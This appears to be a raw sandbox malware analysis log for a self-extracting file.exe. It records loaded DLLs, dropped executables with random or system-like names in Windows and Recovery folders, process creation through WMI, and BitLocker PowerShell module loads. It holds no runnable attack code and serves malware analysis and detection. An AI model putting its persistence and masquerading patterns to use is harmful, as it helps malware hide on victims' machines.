Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: mswsock.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: winhttp.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: dwrite.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: winmm.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: winmmbase.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: edputil.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: mmdevapi.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: devobj.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ksuser.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: avrt.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: audioses.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: powrprof.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: umpdc.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: msacm32.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: midimap.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: windowscodecs.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ntmarta.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: dpapi.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: version.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: wldp.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: profapi.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: mscoree.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: apphelp.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: version.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: wldp.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: profapi.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 2300139 > 1048576

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\file.exe

File created: C:\MsContainer\__tmp_rar_sfx_access_check_5357937

Jump to behavior

Source: file.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CF640 push ecx; ret	0_2_007CF653
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CEB78 push eax; ret	0_2_007CEB96
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Code function: 5_2_00007FF848F15418 push edi; ret	5_2_00007FF848F15430
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Code function: 5_2_00007FF848F13C1F push ecx; retf	5_2_00007FF848F13C2C
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Code function: 5_2_00007FF848F147E1 pushfd ; iretd	5_2_00007FF848F147EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FF848DFD2A5 pushad ; iretd	22_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FF848FE2316 push 8B485F94h; iretd	22_2_00007FF848FE231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF848DFD2A5 pushad ; iretd	23_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF848FE2316 push 8B485F94h; iretd	23_2_00007FF848FE231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848E0D2A5 pushad ; iretd	25_2_00007FF848E0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FF2316 push 8B485F93h; iretd	25_2_00007FF848FF231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 27_2_00007FF848E1D2A5 pushad ; iretd	27_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 27_2_00007FF849002316 push 8B485F92h; iretd	27_2_00007FF84900231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FF848DED2A5 pushad ; iretd	28_2_00007FF848DED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FF848FD2316 push 8B485F95h; iretd	28_2_00007FF848FD231B
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F55581 pushad ; iretd	32_2_00007FF848F55582
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F55592 pushad ; iretd	32_2_00007FF848F55593
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F555AA pushad ; iretd	32_2_00007FF848F555AC
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F521E8 push E8FFFFD5h; iretd	32_2_00007FF848F521ED
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F560B3 push edi; retf	32_2_00007FF848F560B6
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F6BB07 push ebp; retf	32_2_00007FF848F6BB08
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F66B36 push cs; ret	32_2_00007FF848F66B37
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F5BB07 push ebp; retf	33_2_00007FF848F5BB08
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F56B36 push cs; ret	33_2_00007FF848F56B37
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F45581 pushad ; iretd	33_2_00007FF848F45582
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F45592 pushad ; iretd	33_2_00007FF848F45593
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F455AA pushad ; iretd	33_2_00007FF848F455AC
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F421E8 push E8FFFFD5h; iretd	33_2_00007FF848F421ED
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F460B3 push edi; retf	33_2_00007FF848F460B6
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Code function: 42_2_00007FF848F35418 push edi; ret	42_2_00007FF848F35430
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Code function: 42_2_00007FF848F347E1 pushfd ; iretd	42_2_00007FF848F347EB

Source: chainportruntimeCrtMonitor.exe.0.dr	Static PE information: section name: .text entropy: 7.5627675126888025
Source: DtJTopEKFGnyRQt.exe.5.dr	Static PE information: section name: .text entropy: 7.5627675126888025
Source: WmiPrvSE.exe.5.dr	Static PE information: section name: .text entropy: 7.5627675126888025
Source: DtJTopEKFGnyRQt.exe0.5.dr	Static PE information: section name: .text entropy: 7.5627675126888025
Source: DtJTopEKFGnyRQt.exe1.5.dr	Static PE information: section name: .text entropy: 7.5627675126888025
Source: sppsvc.exe.5.dr	Static PE information: section name: .text entropy: 7.5627675126888025

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\MsContainer\sppsvc.exe	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Recovery\DtJTopEKFGnyRQt.exe	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\kWdCPgQJ.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\eyAdKmjt.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\MsContainer\chainportruntimeCrtMonitor.exe	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\gMOMTVsR.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\YmAdlBZw.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\gVlLDILN.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\RzAxqjrs.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\AGJJGYBl.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\oyuBnBbv.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\xcCqXurc.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\gRRDSLOb.log	Jump to dropped file

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe			Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe			Jump to dropped file

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\oyuBnBbv.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\gVlLDILN.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\gMOMTVsR.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\RzAxqjrs.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Users\user\Desktop\xcCqXurc.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\eyAdKmjt.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\YmAdlBZw.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\gRRDSLOb.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\AGJJGYBl.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File created: C:\Users\user\Desktop\kWdCPgQJ.log	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
